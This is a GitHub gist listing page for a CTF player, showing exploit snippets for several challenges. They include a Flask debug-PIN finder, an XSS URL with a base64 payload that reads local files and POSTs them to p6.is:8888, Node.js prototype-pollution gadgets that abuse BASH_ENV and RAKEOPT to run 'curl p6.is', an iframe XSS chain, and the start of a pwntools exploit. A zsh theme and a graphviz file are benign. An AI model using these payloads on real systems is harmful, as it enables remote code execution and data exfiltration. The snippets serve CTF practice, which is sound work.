Skip to content

Instantly share code, notes, and snippets.

View po6ix's full-sized avatar

Posix po6ix

165 followers · 14 following
View GitHub Profile
@po6ix
po6ix / ex.py
Created April 14, 2020 02:52
flask secret pin finder
import hashlib
from itertools import chain
probably_public_bits = [
'flaskweb',
'flask.app',
'Flask',
'/usr/local/lib/python3.7/site-packages/flask/app.py',
]
private_bits = [
@po6ix
po6ix / posix.zsh-theme
Created May 31, 2020 01:59
PROMPT="%(!.%{$fg_bold[red]%}#.%{$fg_bold[green]%}\$)%{$reset_color%} "
RPS1='%{$fg[blue]%}%~$(git_prompt_info)%{$reset_color%} '
ZSH_THEME_GIT_PROMPT_PREFIX="%{$fg[yellow]%}("
ZSH_THEME_GIT_PROMPT_SUFFIX=")%{$reset_color%}"
ZSH_THEME_GIT_PROMPT_CLEAN=""
@po6ix
po6ix / url
Created June 8, 2020 10:22
sol. Highlighter
http://highlighter.ctf.defenit.kr/read?id=1#({})['__proto__']['__defineGetter__']('a',function(){return('\x3cstyle\x3e\x3cstyle/\x3e\x3cscript/src=https://accounts.google.com/o/oauth2/revoke?callback=eval(atob(/ZnVuY3Rpb24gZmV0Y2hMb2NhbFJlc291cmNlKHVybCkgeyAgICAgICAgCiAgICBjb25zdCByZXEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsgICAgCiAgICByZXEub25sb2FkID0gZnVuY3Rpb24oKSB7CiAgICAgICAgY29uc3QgdGV4dCA9IHJlcS5yZXNwb25zZVRleHQ7ICAKICAgICAgICBmZXRjaCgnaHR0cDovL3A2LmlzOjg4ODgnLCB7Im1ldGhvZCI6ICJQT1NUIiwgImJvZHkiOiBlbmNvZGVVUkkodGV4dCl9KTsKICAgIH07ICAgIAogICAgcmVxLm9wZW4oJ0dFVCcsIHVybCk7CiAgICByZXEuc2VuZCgpOwp9OwoKZmV0Y2hMb2NhbFJlc291cmNlKCdmaWxlOi8vLycp/.source))\x3e\x3c/script\x3e');})
@po6ix
po6ix / README.md
Last active July 13, 2020 01:05
tsgctf-note1

Note 1

There was a simple unintentional solution So we could solve this challenge with time based regex injection

The challenge page includes the note create and delete function and ...

  • with location.hash, we can set src attribute of img tag
  • with location.search, we can construct regex for filtering notes by their content. (See Below)
@po6ix
po6ix / 1.js
Created August 17, 2020 06:26
1.js
const child_process = require('child_process');
Object.prototype.BASH_ENV = '`curl http://p6.is`';
Object.prototype.shell = 'bash';
child_process.execSync('env');
@po6ix
po6ix / 2.js
Created August 17, 2020 06:28
2.js
const child_process = require('child_process');
Object.prototype.RAKEOPT = '-e "print `curl p6.is`"';
Object.prototype.shell = 'rake';
child_process.execSync('env');
@po6ix
po6ix / allthelittlethings.html
Created August 24, 2020 04:09
<script>
x = `
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.location.hash=top.document.body.innerHTML.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.location.hash=top.document.body.innerHTML.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.location.hash=top.document.body.innerHTML.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.location.hash=top.document.body.innerHTML.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.location.hash=top.document.body.innerHTML.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.location.hash=top.document.body.innerHTML.valueOf ><\/script>'></iframe>
@po6ix
po6ix / blacklist.py
Created August 30, 2020 17:03
Fword CTF
from pwn import *
context.arch = 'amd64'
# p = process('./blacklist')
p = remote('blacklist.fword.wtf', 1236)
e = ELF('./blacklist')
mprotect = 0x448CF0
read = 0x447D30
@po6ix
po6ix / graphviz++
Last active September 6, 2020 13:23
2020 InterKosenCTF Writeups
digraph g1 {
subgraph cluster_0 {
style=filled;
color=lightgrey;
node [style=filled, color=white];
a0 -> a1 -> a2 -> a3;
}
start -> a0;
a3 -> end;
a1 -> b3;
@po6ix
po6ix / beginners-capsule.js
Last active October 11, 2020 07:23
function WeakMap(...e) {
return {
set: (...e)=>{
console.log(e)
},
has: () => {
console.log(87)
return 1;
}
}